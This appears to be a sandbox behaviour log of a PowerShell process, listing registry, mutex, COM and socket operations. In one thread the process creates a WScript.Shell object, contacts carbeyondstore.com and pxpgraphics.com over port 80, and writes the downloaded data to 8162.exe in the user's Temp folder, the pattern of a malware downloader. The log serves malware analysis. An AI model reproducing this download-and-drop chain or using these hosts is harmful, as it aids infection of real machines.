Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
File	Get Info		1	Fn
File	Get Info		4	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	2	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
File	Get Info		1	Fn
File	Get Info		1	Fn
File	Get Info		1	Fn
File	Get Info		1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn

Thread 0xad4

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Inet	Close Session		1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Inet	Close Session		1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Inet	Close Session		1	Fn
Module	Unmap	process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Module	Unmap	process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn

Thread 0xae4

(Host: 0, Network: 0)

Category	Operation	Information	Count	Logfile
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Memory	Get Info	c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
File	Get Info		1	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	1	Fn Data
Module	Get Filename		1	Fn
File	Get Info		2	Fn
File	Get Info		2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	2	Fn
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE	1	Fn
Module	Map	process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = carbeyondstore.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a974fb9d0>]	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 72.52.246.64, remote_port = 80	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 76, size_out = 76	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 340	1	Fn Data
Inet	Read Response	size = 4096, size_out = 340	1	Fn Data
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = www.carbeyondstore.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a97470250>]	1	Fn
Socket	Connect	remote_address = 72.52.246.64, remote_port = 80	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 72, size_out = 72	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 587	1	Fn Data
Inet	Read Response	size = 4096, size_out = 587	1	Fn Data
File	Write	size = 207	1	Fn Data
File	Get Info		3	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	2	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Write	filename = CONOUT$, size = 291	1	Fn Data
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	3	Fn
File	Write	filename = CONOUT$, size = 1	1	Fn Data
File	Create	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe	2	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = pxpgraphics.com, hints = [<transform_binlog_src.engine.transformer.os.windows.network.functions.fn_dns.AddrInfo object at 0x7f1a9742c4d0>]	1	Fn
Socket	Connect	remote_address = 69.65.3.206, remote_port = 80	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 74, size_out = 74	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 4096	1	Fn Data
Inet	Read Response	size = 4096, size_out = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3164	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3164	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Inet	Read Response	size = 65536, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 5808	1	Fn Data
Inet	Read Response	size = 65536, size_out = 5808	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 7260	1	Fn Data
Inet	Read Response	size = 65536, size_out = 7260	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 6708	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 10164	1	Fn Data
Inet	Read Response	size = 65536, size_out = 10164	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 8972	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Inet	Read Response	size = 65536, size_out = 2904	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 13068	1	Fn Data
Inet	Read Response	size = 65536, size_out = 13068	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 11876	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 15972	1	Fn Data
Inet	Read Response	size = 65536, size_out = 15972	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\hJrD1KOKY DS8lUjv\AppData\Local\Temp\8162.exe, size = 13328	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Inet	Read Response	size = 65536, size_out = 4356	1	Fn Data
